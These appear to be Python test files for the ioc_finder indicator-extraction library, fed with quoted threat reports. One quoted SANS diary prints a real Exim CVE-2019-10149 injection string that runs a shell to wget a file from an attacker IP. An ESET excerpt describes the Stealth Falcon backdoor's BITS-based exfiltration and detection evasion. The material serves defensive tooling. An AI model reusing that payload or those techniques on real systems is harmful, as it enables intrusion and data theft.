#!/usr/bin/env python
# -*- coding: utf-8 -*-

import time

from ioc_finder import ioc_finder


def parse():
    s = """209.217.225.74 port 80 - hotelesmeflo.com - GET /chachapoyas/wp-content/themes/sketch/msr.exe
    SHA256 hash: a666f74574207444739d9c896bc010b3fb59437099a825441e6c745d65807dfc (https://www.virustotal.com/gui/file/a666f74574207444739d9c896bc010b3fb59437099a825441e6c745d65807dfc/detection)

    File size: 9,261 bytes
    File description: Flash exploit used by Rig EK on 2019-06-17
    SHA256 hash: 2de435b78240c20dca9ae4c278417f2364849a5d134f5bb1ed1fd5791e3e36c5 (https://www.virustotal.com/gui/file/2de435b78240c20dca9ae4c278417f2364849a5d134f5bb1ed1fd5791e3e36c5/detection)

    File size: 354,304 bytes
    File description: Payload sent by Rig EK on 2019-06-17 (AZORult)
    SHA256 hash: a4f9ba5fce183d2dfc4dba4c40155c1a3a1b9427d7e4718ac56e76b278eb10d8 (https://www.virustotal.com/gui/file/a4f9ba5fce183d2dfc4dba4c40155c1a3a1b9427d7e4718ac56e76b278eb10d8/community)

    File size: 2,952,704 bytes
    File description: Follow-up malware hosted on URL at hotelesmeflo.com on 2019-06-17
    Final words

    My infected Windows host
    Published : 2019-06-19
    Last Updated : 2019-06-19 14:34:52 UTC
    by Johannes Ullrich (https://plus.google.com/101587262224166552564?rel=author) (Version: 1)

    Thanks to our reader Alex for sharing some of his mail logs with the latest attempts to exploit CVE-2019-10149 (https://isc.sans.edu/vuln.html?cve=2019-10149) (aka "Return of the Wizard"). The vulnerability affects Exim and was patched about two weeks ago. There are likely still plenty of vulnerable servers, but it looks like attackers are branching out and are hitting servers not running Exim as well.

    A couple of logs from our own mail server (running postfix):

    > Jun 19 10:47:10 mail postfix/smtp[19006]: A547240360F4: to=&lt;root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f70.91.145.10x22}}@dshield.org&gt;, relay=204.51.94.153[204.51.94.153]:25, delay=0.82, delays=0.29/0.03/0.45/0.05, dsn=5.1.1, status=bounced (host 204.51.94.153[204.51.94.153] said: 550 5.1.1 &lt;root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f70.91.145.10x22}}@dshield.org&gt;: Recipient address rejected: User unknown in virtual alias table (in reply to RCPT TO command))

    The exploit is attempting to run the following command:

    > /bin/sht-ct &quot;wget 64.50.180.45/tmp/70.91.145.10&quot;

    Note that the IP at the end of the command is our mail servers public IP address. The URL does no longer appear to exist and belongs to a server running cPanel.

    The beginning of the command may actually be a mistake/typo. I believe the attacker is trying to run sh -ct, which would execute the string (wget..).

    ---
    Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute (https://sans.edu)
    Twitter (https://jbu.me/164)
    """
    ioc_finder.find_iocs(s)


# def test_execution_times():
#     """Test how long it takes for the ioc finder package to run."""
#     times = []
#     n = 50

#     for i in range(0, n):
#         start_time = time.time()
#         parse()
#         end_time = time.time()
#         times.append(end_time - start_time)

#     print(times)
#     print('Average time: {}'.format(sum(times) / n))
#     # fail the tests so that the times are printed
#     assert 1 == 2



#!/usr/bin/env python
# -*- coding: utf-8 -*-

from ioc_finder import find_iocs


def test_tlp_labels():
    s = 'tlp amber and TLP:RED'
    iocs = find_iocs(s)
    assert len(iocs['tlp_labels']) == 2
    assert 'TLP:RED' in iocs['tlp_labels']
    assert 'TLP:AMBER' in iocs['tlp_labels']

    s = 'tlp-Amber and TLPRED TlpGreen'
    iocs = find_iocs(s)
    assert len(iocs['tlp_labels']) == 3
    assert 'TLP:RED' in iocs['tlp_labels']
    assert 'TLP:AMBER' in iocs['tlp_labels']
    assert 'TLP:GREEN' in iocs['tlp_labels']


def test_domain_parsing():
    s = "this is just a (google.com) test of example.com"
    iocs = find_iocs(s)
    assert len(iocs['domains']) == 2
    assert 'google.com' in iocs['domains']


def test_ipv4_parsing():
    s = "this is just a (1.2.3.54) test of 255.255.1.255 255.256.344.1"
    iocs = find_iocs(s)
    assert len(iocs['ipv4s']) == 2
    assert '1.2.3.54' in iocs['ipv4s']
    assert '255.255.1.255' in iocs['ipv4s']
    assert '255.256.344.1' not in iocs['ipv4s']


def test_ipv6_parsing():
    s = "2001:0db8:0000:0000:0000:ff00:0042:8329 testing 2001:db8:0:0:0:ff00:42:8329 shfaldkafsdfa 2001:db8::ff00:42:8329 asdfadfas afkj;fl ::1 kljfkadf 1:1"
    iocs = find_iocs(s)
    assert len(iocs['ipv6s']) == 4
    # TODO: the following 3 ipv6s addresses are the same representation of the same thing; I need to deduplicate these more thoroughly in the parsing function
    assert '2001:0db8:0000:0000:0000:ff00:0042:8329' in iocs['ipv6s']
    assert '2001:db8:0:0:0:ff00:42:8329' in iocs['ipv6s']
    assert '2001:db8::ff00:42:8329' in iocs['ipv6s']
    assert '::1' in iocs['ipv6s']
    assert '1:1' not in iocs['ipv6s']


def test_email_address_parsing():
    s = "test@a.com bingo@en.wikipedia.com foo@a.com'.format('a'*63 bar@b.a.com'.format('a'*63, 'a'*63 bad@test-ing.com me@2600.com john.smith(comment)@example.com (comment)john.smith@example.com \"John..Doe\"@example.com' test@[192.168.0.1]"

    iocs = find_iocs(s)
    assert len(iocs['email_addresses_complete']) == 10
    assert 'test@a.com' in iocs['email_addresses_complete']
    assert 'bingo@en.wikipedia.com' in iocs['email_addresses_complete']
    assert 'foo@a.com' in iocs['email_addresses_complete']
    assert 'bar@b.a.com' in iocs['email_addresses_complete']
    assert 'bad@test-ing.com' in iocs['email_addresses_complete']
    assert 'me@2600.com' in iocs['email_addresses_complete']
    assert 'john.smith(comment)@example.com' in iocs['email_addresses_complete']
    assert '(comment)john.smith@example.com' in iocs['email_addresses_complete']
    assert '\"John..Doe\"@example.com' in iocs['email_addresses_complete']
    assert 'test@[192.168.0.1]' in iocs['email_addresses_complete']

    iocs = find_iocs('a@example.com')
    assert iocs['email_addresses_complete'][0] == 'a@example.com'


def test_complex_email_address_parsing():
    s = 'john.smith(comment)@example.com'
    iocs = find_iocs(s)
    assert 'john.smith(comment)@example.com' in iocs['email_addresses_complete']


def test_simple_email_address_parsing():
    s = "test@a.com bingo@en.wikipedia.com foo@a.com'.format('a'*63 bar@b.a.com'.format('a'*63, 'a'*63 bad@test-ing.com me@2600.com john.smith(comment)@example.com (comment)john.smith@example.com \"John..Doe\"@example.com' test@[192.168.0.1]"

    iocs = find_iocs(s)
    assert len(iocs['email_addresses']) == 8
    assert 'test@a.com' in iocs['email_addresses']
    assert 'bingo@en.wikipedia.com' in iocs['email_addresses']
    assert 'foo@a.com' in iocs['email_addresses']
    assert 'bar@b.a.com' in iocs['email_addresses']
    assert 'bad@test-ing.com' in iocs['email_addresses']
    assert 'me@2600.com' in iocs['email_addresses']
    assert 'john.smith@example.com' in iocs['email_addresses']
    assert 'test@[192.168.0.1]' in iocs['email_addresses']

    iocs = find_iocs('a@example.com')
    assert iocs['email_addresses'][0] == 'a@example.com'


def test_url_parsing():
    invalid_urls = [
        'foo@{}.com'.format('a' * 64),
        '!@.com',
        'foo@abc',
        '@@@@-hi-.com',
        '@_hi_.com',
        'me@*hi*.com',
        'foo{}.com'.format('a' * 64),
        '.com',
        'abc',
        '-hi-.com',
        '_hi_.com',
        '*hi*.com',
    ]

    valid_urls = [
        'https://a.com',
        'https://en.wikipedia.com',
        'https://{}.com'.format('a' * 63),
        'https://{}.{}.com'.format('a' * 63, 'a' * 63),
        'https://test-ing.com',
        'https://2600.com',
        'https://example.com',
        'http://example.com',
        'ftp://example.com',
        'http://"John..Doe"@example.com',
        'http://test@a.com',
        'http://bingo@en.wikipedia.com',
        'http://foo@{}.com'.format('a' * 63),
    ]

    iocs = find_iocs(' '.join(valid_urls))
    assert len(iocs['urls']) == 13
    # make sure domains are being parsed from the valid urls as well
    assert len(iocs['domains']) == 7

    iocs = find_iocs(' '.join(invalid_urls))
    assert len(iocs['urls']) == 0

    s = 'http://8pretgdl.r.us-east-1.awstrack.me/L0/http:%2F%2Fwww.excelgoodies.com%2Fexcel-vba-training-in-virginia%23course-content/1/0100016ed23f4bef-b14931bd-26f6-4130-9c37-c4f9902a771d-000000/mHJBuJ8D1RcIDE3jrWkdw4I9im4=138'
    iocs = find_iocs(s)
    assert iocs['urls'] == [
        'http://8pretgdl.r.us-east-1.awstrack.me/L0/http:%2F%2Fwww.excelgoodies.com%2Fexcel-vba-training-in-virginia%23course-content/1/0100016ed23f4bef-b14931bd-26f6-4130-9c37-c4f9902a771d-000000/mHJBuJ8D1RcIDE3jrWkdw4I9im4=138'
    ]


def test_file_hash_parsing():
    s = "{} {} {} {} {}".format('A' * 32, 'a' * 32, 'b' * 40, 'c' * 64, 'd' * 128)
    iocs = find_iocs(s)
    assert len(iocs['md5s']) == 1
    assert len(iocs['sha1s']) == 1
    assert len(iocs['sha256s']) == 1
    assert len(iocs['sha512s']) == 1


def test_asn_parsing():
    s = "asn1234 as1234 asn 1234 as 1234 AS 4321 ASN4321"
    iocs = find_iocs(s)
    # this test works because all of the asns should be standardized into the same form
    assert len(iocs['asns']) == 2
    assert 'ASN1234' in iocs['asns']
    assert 'ASN4321' in iocs['asns']


def test_cve_parsing():
    s = "cve-2014-1000 cve 2014-1001 cve-1999-1002 CVE 2999-1003 CVE 1928-1004"
    iocs = find_iocs(s)
    assert len(iocs['cves']) == 5
    assert 'CVE-2014-1000' in iocs['cves']
    assert 'CVE-2014-1001' in iocs['cves']
    assert 'CVE-1999-1002' in iocs['cves']
    assert 'CVE-2999-1003' in iocs['cves']
    assert 'CVE-1928-1004' in iocs['cves']


def test_ipv4_cidr_parsing():
    s = "1.2.3.4/0 1.2.3.4/10 1.2.3.4/20 1.2.3.4/32"
    iocs = find_iocs(s)
    assert len(iocs['ipv4_cidrs']) == 4
    assert '1.2.3.4/0' in iocs['ipv4_cidrs']
    assert '1.2.3.4/10' in iocs['ipv4_cidrs']
    assert '1.2.3.4/20' in iocs['ipv4_cidrs']
    assert '1.2.3.4/32' in iocs['ipv4_cidrs']

    s = "1.2.3.4/0 1.2.3.4/10 1.2.3.4/20 1.2.3.4/32"
    iocs = find_iocs(s, parse_address_from_cidr=False)
    assert len(iocs['ipv4_cidrs']) == 4
    assert len(iocs['ipv4s']) == 0


def test_registry_key_parsing():
    s = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows HKLM\Software\Microsoft\Windows HKCC\Software\Microsoft\Windows"
    iocs = find_iocs(s)
    assert len(iocs['registry_key_paths']) == 3
    assert 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows' in iocs['registry_key_paths']
    assert 'HKLM\Software\Microsoft\Windows' in iocs['registry_key_paths']
    assert 'HKCC\Software\Microsoft\Windows' in iocs['registry_key_paths']


def test_adsense_publisher_id_parsing():
    s = "pub-1234567891234567"
    iocs = find_iocs(s)
    assert len(iocs['google_adsense_publisher_ids']) == 1
    iocs['google_adsense_publisher_ids'][0] == 'pub-1234567891234567'

    s = "pub-1234567891234567 pub-9383614236930773"
    iocs = find_iocs(s)
    assert len(iocs['google_adsense_publisher_ids']) == 2
    assert 'pub-1234567891234567' in iocs['google_adsense_publisher_ids']
    assert 'pub-9383614236930773' in iocs['google_adsense_publisher_ids']


def test_analytics_publisher_id_parsing():
    s = "UA-000000-2"
    iocs = find_iocs(s)
    assert len(iocs['google_analytics_tracker_ids']) == 1
    assert iocs['google_analytics_tracker_ids'][0] == 'UA-000000-2'

    s = "UA-000000-2 UA-00000000-99"
    iocs = find_iocs(s)
    assert len(iocs['google_analytics_tracker_ids']) == 2
    assert 'UA-000000-2' in iocs['google_analytics_tracker_ids']
    assert 'UA-00000000-99' in iocs['google_analytics_tracker_ids']


def test_bitcoin_parsing():
    s = """1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2.
P2SH type starting with the number 3, eg: 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy.
Bech32 type starting with bc1, eg: bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq"""
    iocs = find_iocs(s)
    assert len(iocs['bitcoin_addresses']) == 3
    assert '1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2' in iocs['bitcoin_addresses']
    assert '3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy' in iocs['bitcoin_addresses']
    assert 'bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq' in iocs['bitcoin_addresses']


def test_xmpp_address_parsing():
    s = """foo@swissjabber.de bar@jabber.zone bom@jabber.sow.as me@example.com"""
    iocs = find_iocs(s)
    assert len(iocs['xmpp_addresses']) == 3
    assert 'foo@swissjabber.de' in iocs['xmpp_addresses']
    assert 'bar@jabber.zone' in iocs['xmpp_addresses']
    assert 'bom@jabber.sow.as' in iocs['xmpp_addresses']
    assert len(iocs['domains']) == 4
    # make sure the xmpp addresses are not also parsed as email addresses
    assert len(iocs['email_addresses']) == 1

    iocs = find_iocs(s, parse_domain_name_from_xmpp_address=False)
    assert len(iocs['xmpp_addresses']) == 3
    assert 'foo@swissjabber.de' in iocs['xmpp_addresses']
    assert 'bar@jabber.zone' in iocs['xmpp_addresses']
    assert 'bom@jabber.sow.as' in iocs['xmpp_addresses']
    assert len(iocs['domains']) == 1
    # make sure the xmpp addresses are not also parsed as email addresses
    assert len(iocs['email_addresses']) == 1


def test_mac_address_parsing():
    s = 'AA-F2-C9-A6-B3-4F AB:F2:C9:A6:B3:4F ACF2.C9A6.B34F'

    iocs = find_iocs(s)
    assert len(iocs['mac_addresses']) == 3
    assert 'AA-F2-C9-A6-B3-4F' in iocs['mac_addresses']
    assert 'AB:F2:C9:A6:B3:4F' in iocs['mac_addresses']
    assert 'ACF2.C9A6.B34F' in iocs['mac_addresses']

    # same thing, just lower-case
    s = 'aa-f2-c9-a6-b3-4f ab:f2:c9:a6:b3:4f acf2.c9a6.b34f'
    iocs = find_iocs(s)
    assert len(iocs['mac_addresses']) == 3
    assert 'aa-f2-c9-a6-b3-4f' in iocs['mac_addresses']
    assert 'ab:f2:c9:a6:b3:4f' in iocs['mac_addresses']
    assert 'acf2.c9a6.b34f' in iocs['mac_addresses']


def test_ssdeep_parsing():
    s = "1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U"
    iocs = find_iocs(s)
    assert len(iocs['ssdeeps']) == 1
    assert iocs['ssdeeps'][0] == '1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U'

    s = "ahdfadsfa 1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U,000/000/000000001 adfasf"
    iocs = find_iocs(s)
    assert len(iocs['ssdeeps']) == 1
    assert iocs['ssdeeps'][0] == '1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U'

    s = """c2b257868686c861d43c6cf3de146b8812778c8283f7d
Threat  Zepakab/Zebrocy Downloader
ssdeep  12288:QYV6MorX7qzuC3QHO9FQVHPF51jgcSj2EtPo/V7I6R+Lqaw8i6hG0:vBXu9HGaVHh4Po/VU6RkqaQ6F"""
    iocs = find_iocs(s)
    assert len(iocs['ssdeeps']) == 1
    assert iocs['ssdeeps'][0] == '12288:QYV6MorX7qzuC3QHO9FQVHPF51jgcSj2EtPo/V7I6R+Lqaw8i6hG0:vBXu9HGaVHh4Po/VU6RkqaQ6F'

    s = """393216:EW/eKCo9QgoHfHYebwoyC0QStQYEb+G8j3wfVOglnimQyCK+mteYREDWXKF2b:MKg3lbwoyCnCkNHlnimfCSQx8b,"000/000/000000001"
196608:AGSE26mYSK0iwH8HW9TDl0vnvCZwZEkzzeap7R:Ak28siwH8eRSn25k3eg,"000/000/000000002"
98304:O1OCzezOgr4XMP7Af0+Kh7MzplFKuu5XcS9QnCD/VWR6yf4OB6S/mwRTwjf0ih87:k/Y4XMT7YguEXqCD/VWR6yf4Ux/mwR0S,"000/000/000000003"
96:ukILJhn54RewghSib4xGEHVLFNs+4tihJW6jJenUQrsIvpMMjUg:uk0Jx54usxJHh4gJrJenUQrs2pvIg,"000/000/000000004"
196608:rNI4QlKQbWQobu0u3QRBBibfv+Z4Hjy5M+IjunAadLLtt42fAtQSqFhx:rNkK2obu0uBb3K4H28yAGc4RSax,"000/000/000000005"
1536:mFbhArcCMbR0S/kjzU6El4mUIR2JPmvY3lpKa38fTXcTns+b3tfZyCLtRs:obNCMbWpU6SzFAPV3lpCjCsQRZyQt6,"000/000/000000006"
48:CScrEd3jk5BsRSFCWfVsEWABbbpnWSgSX45dc6b5Qla9A+o5R6k7CyNRD5J:XcrEdzHRSFr9sE7XnsDe1CyNRNJ,"000/000/000000007"
24:N8Rw5AF4REesFtPP6k216xoWya1oxOKHHwa8peRK8FdigZY5tODrRRK8RfMfde8:N8Rw5AF4+XPyooa2EKnwaGeRJFYpfwzQ,"000/000/000000008"
1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U,"000/000/000000009"""
    iocs = find_iocs(s)
    assert len(iocs['ssdeeps']) == 9
    assert (
        '393216:EW/eKCo9QgoHfHYebwoyC0QStQYEb+G8j3wfVOglnimQyCK+mteYREDWXKF2b:MKg3lbwoyCnCkNHlnimfCSQx8b'
        in iocs['ssdeeps']
    )
    assert '196608:AGSE26mYSK0iwH8HW9TDl0vnvCZwZEkzzeap7R:Ak28siwH8eRSn25k3eg' in iocs['ssdeeps']
    assert (
        '98304:O1OCzezOgr4XMP7Af0+Kh7MzplFKuu5XcS9QnCD/VWR6yf4OB6S/mwRTwjf0ih87:k/Y4XMT7YguEXqCD/VWR6yf4Ux/mwR0S'
        in iocs['ssdeeps']
    )
    assert '96:ukILJhn54RewghSib4xGEHVLFNs+4tihJW6jJenUQrsIvpMMjUg:uk0Jx54usxJHh4gJrJenUQrs2pvIg' in iocs['ssdeeps']
    assert (
        '196608:rNI4QlKQbWQobu0u3QRBBibfv+Z4Hjy5M+IjunAadLLtt42fAtQSqFhx:rNkK2obu0uBb3K4H28yAGc4RSax' in iocs['ssdeeps']
    )
    assert (
        '1536:mFbhArcCMbR0S/kjzU6El4mUIR2JPmvY3lpKa38fTXcTns+b3tfZyCLtRs:obNCMbWpU6SzFAPV3lpCjCsQRZyQt6'
        in iocs['ssdeeps']
    )
    assert (
        '48:CScrEd3jk5BsRSFCWfVsEWABbbpnWSgSX45dc6b5Qla9A+o5R6k7CyNRD5J:XcrEdzHRSFr9sE7XnsDe1CyNRNJ' in iocs['ssdeeps']
    )
    assert (
        '24:N8Rw5AF4REesFtPP6k216xoWya1oxOKHHwa8peRK8FdigZY5tODrRRK8RfMfde8:N8Rw5AF4+XPyooa2EKnwaGeRJFYpfwzQ'
        in iocs['ssdeeps']
    )
    assert '1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U' in iocs['ssdeeps']


def test_imphash_parsing():
    names = ['imphash', 'import hash']
    templates = [
        """SHA-256 093e394933c4545ba7019f511961b9a5ab91156cf791f45de074acad03d1a44a
Dropper {}: 18ddf28a71089acdbab5038f58044c0a
C2 IP: 210.209.127.8:443""",
        '{}: 18ddf28a71089acdbab5038f58044c0a',
        '{} 18ddf28a71089acdbab5038f58044c0a',
        '{}  18ddf28a71089acdbab5038f58044c0a',
        '{}:     18ddf28a71089acdbab5038f58044c0a',
        '{}\t18ddf28a71089acdbab5038f58044c0a',
        '{}\n18ddf28a71089acdbab5038f58044c0a',
        '{} - 18ddf28a71089acdbab5038f58044c0a',
    ]

    for template in templates:
        for name in names:
            print(template)
            iocs = find_iocs(template.format(name))
            assert len(iocs['imphashes']) == 1
            assert iocs['imphashes'] == ['18ddf28a71089acdbab5038f58044c0a']
            assert len(iocs['md5s']) == 0

            iocs = find_iocs(template.format(name.upper()))
            assert len(iocs['imphashes']) == 1
            assert iocs['imphashes'] == ['18ddf28a71089acdbab5038f58044c0a']
            assert len(iocs['md5s']) == 0


def test_authentihash():
    names = ['authentihash']
    templates = [
        '{} 3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
        '{}   3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
        '{}: 3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
        '{}:     3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
        '{} - 3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
        '{}-3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
        '{}\t3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
        '{}\n3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
    ]

    for template in templates:
        for name in names:
            print(template)
            iocs = find_iocs(template.format(name))
            assert len(iocs['authentihashes']) == 1
            assert iocs['authentihashes'] == ['3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4']
            assert len(iocs['sha256s']) == 0

            iocs = find_iocs(template.format(name.upper()))
            assert len(iocs['authentihashes']) == 1
            assert iocs['authentihashes'] == ['3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4']
            assert len(iocs['sha256s']) == 0


def test_user_agents():
    s = 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)'
    iocs = find_iocs(s)
    assert len(iocs['user_agents']) == 1
    assert iocs['user_agents'] == ['Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)']

    s = 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/535.11 (khtml, like gecko) chrome/17.0.963.56 safari/535.11 mozilla/5.0 (windows nt 6.1; wow64; rv:11.0) gecko firefox/11.0'
    iocs = find_iocs(s)
    assert len(iocs['user_agents']) == 2
    assert (
        'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/535.11 (khtml, like gecko) chrome/17.0.963.56 safari/535.11'
        in iocs['user_agents']
    )
    assert 'mozilla/5.0 (windows nt 6.1; wow64; rv:11.0) gecko firefox/11.0' in iocs['user_agents']

    # test the same thing as above but with different casing to make sure the cases are matched and maintained properly
    s = 'Mozilla/5.0 (Windows nt 6.1; wow64) Applewebkit/535.11 (khtml, like Gecko) Chrome/17.0.963.56 Safari/535.11 Mozilla/5.0 (Windows nt 6.1; wow64; rv:11.0) Gecko Firefox/11.0'
    iocs = find_iocs(s)
    assert len(iocs['user_agents']) == 2
    assert (
        'Mozilla/5.0 (Windows nt 6.1; wow64) Applewebkit/535.11 (khtml, like Gecko) Chrome/17.0.963.56 Safari/535.11'
        in iocs['user_agents']
    )
    assert 'Mozilla/5.0 (Windows nt 6.1; wow64; rv:11.0) Gecko Firefox/11.0' in iocs['user_agents']


def test_file_paths():
    s = r"""C:\Users\<username>\AppData \Local\Microsoft\Windows\shedaudio.exe

C:\Users\<username>\AppData\Roaming\Macromedia\Flash Player\macromedia\bin\flashplayer.exe

Typical Registry Keys:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

System Root Directories:

C:\Windows\11987416.exe

C:\Windows\System32\46615275.exe

C:\Windows\System32\shedaudio.exe

C:\Windows\SysWOW64\f9jwqSbS.exe"""
    iocs = find_iocs(s)
    assert len(iocs['file_paths']) == 6
    assert r'C:\Users\<username>\AppData \Local\Microsoft\Windows\shedaudio.exe' in iocs['file_paths']
    assert (
        r'C:\Users\<username>\AppData\Roaming\Macromedia\Flash Player\macromedia\bin\flashplayer.exe'
        in iocs['file_paths']
    )
    assert r'C:\Windows\11987416.exe' in iocs['file_paths']
    assert r'C:\Windows\System32\46615275.exe' in iocs['file_paths']
    assert r'C:\Windows\System32\shedaudio.exe' in iocs['file_paths']
    assert r'C:\Windows\SysWOW64\f9jwqSbS.exe' in iocs['file_paths']

    s = 'test /Library/Storage/File System/HFS/25cf5d02-e50b-4288-870a-528d56c3cf6e/pivtoken.appex file'
    iocs = find_iocs(s)
    assert len(iocs['file_paths']) == 1
    assert '/Library/Storage/File System/HFS/25cf5d02-e50b-4288-870a-528d56c3cf6e/pivtoken.appex' in iocs['file_paths']

    s = '~/Desktop/test.py'
    iocs = find_iocs(s)
    assert len(iocs['file_paths']) == 1
    assert '~/Desktop/test.py' in iocs['file_paths']

    s = '/etc/init.d/.rebootime'
    iocs = find_iocs(s)
    assert len(iocs['file_paths']) == 1
    assert '/etc/init.d/.rebootime' in iocs['file_paths']


def test_phone_numbers():
    phone_number_blocks = [['123', '4567'], ['123', '456', '7890'], ['(123)', '456', '7890']]

    block_connectors = ['-', ' - ', '.', ' . ', ' ']

    for block in phone_number_blocks:
        for connector in block_connectors:
            phone_number = connector.join(block)
            print(phone_number)
            iocs = find_iocs(phone_number)
            assert len(iocs['phone_numbers']) == 1
            assert iocs['phone_numbers'][0] == phone_number



# -*- coding: utf-8 -*-

from ioc_finder import find_iocs


def test_registry_keys_1():
    s = """
ESET researchers discovered a backdoor linked to malware used by the Stealth Falcon group, an operator of targeted spyware attacks against journalists, activists and dissidents in the Middle East

Stealth Falcon is a threat group, active since 2012, that targets political activists and journalists in the Middle East. It has been tracked by the Citizen Lab (https://citizenlab.ca/about/), a non-profit organization focusing on security and human rights, which published an analysis (https://citizenlab.ca/2016/05/stealth-falcon/) of a particular cyberattack in 2016. In January of 2019, Reuters published an investigative report (https://www.reuters.com/investigates/special-report/usa-spying-raven/) into Project Raven, an initiative allegedly employing former NSA operatives and aiming at the same types of targets as Stealth Falcon.

Based on these two reports referring to the same targets and attacks, Amnesty International’s Senior Technologist, Claudio Guarnieri, has concluded that Stealth Falcon and Project Raven actually are the same group.

Figure 1. Claudio Guarnieri has connected Stealth Falcon with Project Raven

Some technical information about Stealth Falcon has already been made public – notably, in the already mentioned analysis by the Citizen Lab.

The key component in the attack documented in the Citizen Lab report was a PowerShell-based backdoor, delivered via a weaponized document that was included in a malicious email.

Now, we have found a previously unreported binary backdoor we have named Win32/StealthFalcon. In this article, we disclose similarities between this binary backdoor and the PowerShell script with backdoor capabilities attributed to the Stealth Falcon group. We consider the similarities to be strong evidence that Win32/StealthFalcon was created by this group.

The Win32/StealthFalcon backdoor, which appears to have been created in 2015, allows the attacker to control the compromised computer remotely. We have seen a small number of targets in UAE, Saudi Arabia, Thailand, and the Netherlands; in the latter case, the target was a diplomatic mission of a Middle Eastern country. How the backdoor was distributed and executed on the target systems is beyond the scope of this investigation; our analysis focuses on its capabilities and its C&C communication.

C &C communication
In its communication with the C&C server, Win32/StealthFalcon uses the standard Windows component Background Intelligent Transfer Service (https://docs.microsoft.com/en-us/windows/win32/bits/background-intelligent-transfer-service-portal) (BITS), a rather unusual technique. BITS was designed to transfer large amounts of data without consuming a lot of network bandwidth, which it achieves by sending the data with throttled throughput so as not to affect the bandwidth needs of other applications. It is commonly used by updaters, messengers, and other applications designed to operate in the background. This means that BITS tasks are more likely to be permitted by host-based firewalls (https://www.secureworks.com/blog/malware-lingers-with-bits).

Compared with traditional communication via API functions, the BITS mechanism is exposed through a COM interface and thus harder for a security product to detect. Moreover, this design is reliable and stealthy. The transfer resumes automatically after being interrupted for reasons like a network outage, the user logging out, or a system rebootMoreover, because BITS adjusts the rate at which files are transferred based on the bandwidth available, the user has no reason for suspicion.

Win32/StealthFalcon can switch the communication between two C&C servers whose addresses are stored in a registry key, along with other configuration values, and can be updated by one of the backdoor commands. In case the backdoor fails to reach out to its C&C servers, the backdoor removes itself from the compromised system after a preconfigured number of failed attempts.

Capabilities
Win32/StealthFalcon is a DLL file which, after execution, schedules itself as a task running on each user login. It only supports basic commands but displays a systematic approach to data collection, data exfiltration, employing further malicious tools, and updating its configuration.

Command name    Functionality
K   Uninstall itself
CFG Update configuration data
RC  Execute the specified application
DL  Write downloaded data to file
CF  Prepare a file for exfiltration
CFW Exfiltrate and delete files
CFWD    Not implemented/no operation
Table 1. Backdoor commands

For example, the backdoor’s key capability, downloading and executing files, is achieved via regular checks for libraries named "win* .dll" or "std* .dll" in the directory the malware is executed from, and loading these libraries.

Furthermore, Win32/StealthFalcon collects files and prepares them for exfiltration by storing an encrypted copy with a hardcoded prefix in a temporary folder. It then regularly checks for such files and exfiltrates them automatically. After the files have been successfully exfiltrated, the malware safe-deletes all log files and collected files – before deleting the files, it rewrites them with random data – to prevent forensic analysis and recovery of the deleted data.

The configuration values are stored in the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions registry key. All values are prefixed by the malware’s filename (without extension).

Value name suffix   Content
-FontDisposition    Randomly generated, 4-byte victim ID
-MRUData    RC4-encrypted C&C domain
-MRUList    RC4-encrypted C&C domain
-IconPosition   Flag determining which of the C&C domains should be used
-IconDisposition    Number of seconds to sleep after each iteration of contacting the C&C server
-PopupPosition  Counter of failed attempts to reach the C&C servers
|

Table 2. Configuration data stored in registry

Possible trick to evade detection

Of interest is a function that is executed before any malicious payload is started, and which seems redundant. It references 300+ imports, but does not use them at all. Instead, it always returns and continues with the payload afterward, without condition checks that would suggest it is an anti-emulation trick.

Figure 2. A function referencing hundreds of unused imports, possibly added to avoid detection of the malware

